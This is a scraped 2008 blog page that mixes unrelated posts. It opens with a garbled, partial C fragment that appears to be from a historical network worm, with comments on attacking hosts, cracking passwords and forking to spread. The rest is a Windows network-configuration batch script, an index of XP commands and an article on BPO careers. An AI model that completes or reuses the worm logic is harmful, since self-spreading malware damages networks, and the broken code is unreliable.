else {/* check for 1l.c in argument list */
if (!strncmp(argv([n], "1l.c", 4))
okay = 1; /* load an object file into memory */
load_object (argv[n];
/* clean up by unlinking file */
if (parent)
unlink (argv[n]); /* and removing object file name */
strcpy (argv[n++], "");
}
} /* if 1l.c was not in argument list, quit */
if (!okay)
exit (0); /* reset process group */
setpgrp (getpid()); /* kill parent shell if parent is set */
if (parent)
kill(parent, SIGHUP); /* scan for network interfaces */
if_init(); /* collect list of gateways from netstat */
rt_init(); /* start main loop */
doit();
}
int
doit()
{current_time = time (0); /* seed random number generator (again) */
srand48(current_time);
/* attack gateways, local nets, remote nets */
attack_hosts(); /* check for a "listening" worm */
check_other () /* attempt to send byte to "ernie" */
send_message ()
for (;;) { /* crack some passwords */
crack_some (); /* sleep or listen for other worms */
other_sleep (30);
crack_some (); /* switch process id's */
if (fork()) /* parent exits, new worm continues */
exit (0); /* attack gateways, known hosts */
attack_hosts();
other_sleep(120); /* if 12 hours have passed, reset hosts */
if(time (0) == current_time + (3600*12)) {
reset_hosts();
current_time = time(0); }
/* quit if pleasequit is set, and nextw>10 */
if (pleasequit && nextw > 10)
exit (0);}}

Food art



Saturday, November 15, 2008

I need explanation.


Warning !!

All the Notes, Codes and tutorials are used for educationl purpose only. if you use code, scripts and other materials from this blog, It may be HARMFUL for your computer. Applied them on your own risk.

Happy Blogging..

with regards;
Rohit Kapoor.
Administrator,
http://myyouthcafe.blogspot.com/

collect and check Network Configuration

This batch file is a mere collection of commands that collect network configuration settings on a Windows server, and write them to a file. This would be useful in situations such as

You need to move a server to new hardware, so you want to collect network configuration so that you can reproduce it

To check the network configuration before you run dcpromo (create a domain controller) After dcpromo : to check network configuration, in particular whether the domain controller correctly registers in DNS.

The Script is Here!!


@echo OFF
ECHO checking network configuration

REM netdiag _ saves log in current directory
Netdiag


ECHO exporting DNS settings

IF EXIST %systemroot%\system32\dns\DNS_zone.txt DEL %systemroot%\system32\dns\DNS_zone.txt
dnscmd /ZoneExport kicks.local DNS_zone.txt
dnscmd SRV01 /EnumRecords kicks.local > DNSRecords.txt
COPY %systemroot%\system32\dns\DNS_zone.txt


Echo.
Echo exporting DHCP configuration (and WINS)

netsh DHCP server dump > dhcpconf.txt
netsh WINS server dump > winsconf.txt


REM COLLECT GENERAL NETWORK SETTINGS
ipconfig /ALL > ipconf.txt
netsh dump > netdump_all.txt

ECHO done. results saved in current directory:
DIR /L /B *.txt

Windows XP command line

An A-Z Index of the Windows XP command line

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data

DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directoryDSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory

ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the current script/routine and set an errorlevel.
EXPAND Uncompress files
EXTRACT Uncompress CAB files

FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR /F Loop command: against a set of files
FOR /F Loop command: against the results of another command
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line

HELP Online Help
HFNETCHK Network Security Hotfix Checker

IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

KILL Remove a program from memory

LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file

MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics IIWMIC WMI Commands

XCACLS Change file permissions
XCOPY Copy files and folders

Your Currency

Friday, November 14, 2008

Thought of the Day

Never take some one for granted,Hold every person Close to your Heart because you might wake up one day and realise that you have lost a diamond while you were too busy collecting stones." Remember this always in life.

All you need to know about a BPO career



Even in the face of the ongoing US meltdown (see end of article for more details) the BPO industry provides some of the most lucrative job opportunities on the market today. But how do you get into this market? And, once there, what do you need to do to make the big bucks that people keep promising? We take a look at some of the answers.


Entry:
One of the most attractive things about some processes in the BPO industry is that they need only a basic 10+2 to enter. No international BPO unit hires an employee who is less than 18 years old, although domestic BPO outfits do (this isn't a problem if you have a sneaky headhunter).


What is definitely required from a candidate is good communication skills and a willingness to learn. Many BPO companies hire candidates with basic qualifications and then train them. A company will pay a candidate more if s/he already possesses the necessary skills. Few companies will only hire employees who have had some kind of previous work experience.
High Attrition Industry:
Even after years of experience, the HR departments of BPO companies have to deal with huge attrition levels.

"Despite the fact that we offer starting salaries of Rs 12,000-15,000, much higher than the market rate for a job demanding the same qualifications, we're experiencing annual attrition rates of 40-50 per cent," says Bipin Chauhan, an HR manager at Pangea3, "It's one of the biggest problems facing the industry."

One of the reasons is the fact that many view the BPO industry as a short-term, lucrative careers option. The odd hours, routine nature of the work and the stress of constantly dealing with irate customers also take their toll on the workforce. These aren't the only reasons though.

"Among those committed to the BPO industry, there are many reasons to leave a job," says Lokesh Manu, who worked as a third person collection executive at 24/7. "A major one is that BPOs frequently poach each other's employees, so you may get a better -- that is, higher paying -- job elsewhere. Also, many BPO employees move to Knowledge Process Outsourcing companies, which pay better and are also more interesting. And of course, some people, who enter the industry with the intention of staying, leave because they're turned off by the hard partying lifestyle."

Kinds of Work:
Other than the well-known call centres (called voice-based processes), there are many higher-end BPOs which handle value added functions like invoice processing and research.

Another trend which promises to prove to be huge is the emergence of Knowledge Process Outsourcing. These are companies that handle high-end back office transactions like data analysis, planning etc. Legal Process Outsourcing is an example of this trend. Such companies hire skilled workers: MBAs, lawyers etc and have attrition rates in single digits. They also pay much better than BPOs, since they require employees with CAs, PhDs etc.

Levels of Work:
An entry-level employee in a BPO unit is known, among other things, as an 'agent', 'associate' or 'executive'. The entry-level positions exist for those with under two years of experience. At a voice-based BPO unit, the salary at entry level is roughly Rs 12,000-20,000 per month, depending on a person's educational qualifications, experience and whether or not he or she has had any previous training, relieving the company of the need to train him or her.

At a non-voice based BPO unit, entry-level salaries vary from Rs 15,000-25,000. KPO units, requiring the high-level talent and qualifications that they do, pay Rs 18,000-30,000 per month.

BPO companies tend to have a relatively flat hierarchy. After three or four years of experience, an agent may be promoted to team leader. "We promote roughly a quarter of our employees in a given year," says Bipin "This is because the industry -- and the company -- are expanding at breakneck speed, so there is plenty of space for an employee to take on new roles."

A team leader in a voice-based BPO makes Rs 24,000-32,000 per month. A team leader in a non-voice BPO makes Rs 27,000-35,000 per month. A team leader in a KPO can rake in Rs 40,000+ a month.

The project manager is the highest level at which one is directly associated with processes in a company. A project manager at a voice-based BPO company makes between Rs 45,000-50,000 per month. A project manger at a non-voice BPO unit earns Rs 48,000-52,000 per month and a project manager at a KPO earns Rs 50,000 per month.

Training and Cross-Functionality :
BPO companies, on a scale and with willingness absent in other industries, encourage their employees to take up training programmes that strengthen their skills or help them develop new ones. Not only do they grant employees the leave required to take up these programmes but some even fund them.

These programmes vary from those that teach agents to communicate more effectively with customers to MBAs in certain disciplines for managers. The key to progress in a BPO is to acquire new skills. Since the structure of the organisation does not change very often, it is easy to evaluate what skills -- and, by extension, courses -- are needed and what impact they will have on your career.

BPO units reward a person who has the ability -- and will -- to acquire new skills. A crucial component of one's career is internal job rotation: swapping job roles within the company itself, thus building a skillset that cuts across functions.

"This is very important as it sends out a very strong signal about the person and his work ethic." says Lokesh, "Companies want someone who can take on new challenges. I've had many friends who have been re-hired -- at good salaries -- by companies they've left who want to use the skills that the employees have gained while working for another company."

Employees will receive performance reviews every six months -- in some company's, every three -- which serve to gauge an employees' progress. At this point, new roles are assigned and training programmes recommended. This mobility is the key to success in the BPO sector, where talent is always short and good, enterprising employees are the most sought after commodity on the market.

Recession?:
With the US economy sagging and appearing ready to go into recession, BPO units are set to take a hit. However "It's still a very high growth industry," says Lokesh, "The cost-saving power of outsourcing is so powerful -- and potential so vast -- the industry will continue to grow even through hard times. The growth will be slowed down, and raises and promotions severely hit, but it's still one of the best options available to a young professional."

Youth Adda Moderater